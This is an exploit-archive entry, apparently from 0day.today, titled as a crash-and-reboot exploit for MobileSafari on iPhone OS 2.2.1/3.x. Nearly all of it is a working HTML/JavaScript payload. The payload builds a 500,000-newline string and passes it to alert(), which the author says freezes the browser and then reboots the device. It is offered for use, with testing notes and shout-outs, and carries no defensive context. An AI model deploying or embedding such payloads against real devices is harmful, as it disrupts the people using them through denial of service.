id: 6988
date: 08/30/2009
title: Apple Safari iPhone 2.2.1/3.x (Mobile) Crash & Reboot Exploit (loop)
author: TheLeader
cves: 

==========================================
Apple iPhone (MobileSafari) Crash & Reboot
==========================================

# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il

# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.

# Exploit:

<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
  a += '\n';
}
alert(a);
</script>
</body>
</html>


#  0day.today [2023-03-23]  #